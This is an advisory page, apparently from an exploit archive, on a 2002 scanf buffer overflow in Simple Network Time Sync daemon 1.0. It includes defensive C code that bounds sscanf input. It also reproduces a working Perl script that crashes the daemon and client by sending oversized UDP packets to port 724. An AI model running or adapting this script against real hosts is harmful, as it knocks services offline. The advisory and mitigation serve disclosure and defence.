Vendor: Simple Network Time Sync Daemon and Client
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Buffer Overflow
CWE: 120 (Buffer Copy without Checking Size of Input)
Product Name: Simple Network Time Sync Daemon and Client
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Platforms Tested: RedHat 6.1
2002

Scanf Overflow in Simple Network Time Sync Daemon and Client

A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with.

Mitigation:

Ensure that all input is properly validated and sanitized before being used in a scanf call.
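
One way to apply this mitigation in C, as an added example (not code from the advisory or from the daemon's source): bound the %s conversion with a field width and reject tokens that do not fit instead of truncating them. The 50-byte buffer is an assumption taken from the advisory's "50 characters"; parse_field, FIELD_MAX and the sample payloads are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 49               /* longest token accepted */
#define FIELD_LEN (FIELD_MAX + 1)  /* assumed 50-byte destination buffer */
#define STR_(x) #x
#define STR(x) STR_(x)

/* Unbounded form that overflows (shown as a comment only):
 *     char field[FIELD_LEN];
 *     sscanf(packet, "%s", field);    copies until whitespace, any length
 */

/* Copy the first whitespace-delimited token of a datagram into out.
 * Returns 0 on success, -1 if the payload is empty, oversized, contains
 * a NUL byte, or carries a token longer than FIELD_MAX. */
int parse_field(const char *payload, size_t len, char out[FIELD_LEN])
{
    char line[512];
    int used = 0;

    out[0] = '\0';
    if (len == 0 || len >= sizeof line || memchr(payload, '\0', len))
        return -1;
    memcpy(line, payload, len);
    line[len] = '\0';              /* UDP payloads are not NUL-terminated */

    /* "%49s" writes at most 49 bytes plus the terminator; %n records
     * how far the scan got so truncation can be detected. */
    if (sscanf(line, "%" STR(FIELD_MAX) "s%n", out, &used) != 1)
        return -1;
    if (line[used] != '\0' && !isspace((unsigned char)line[used])) {
        out[0] = '\0';             /* token did not fit: reject, don't truncate */
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample payloads. */
    const char ok[] = "ntp1.example.test 42\n";
    const char big[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";
    char field[FIELD_LEN];
    printf("ok  -> %d\n", parse_field(ok, sizeof ok - 1, field));
    printf("big -> %d\n", parse_field(big, sizeof big - 1, field));
    return 0;
}
```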

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1289/info

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

send_packet(); # Needs to send 2 packets to kill the client and the server daemons
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);

$|=1;

connect(SH, $sin) || die "$!\n";

# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);

}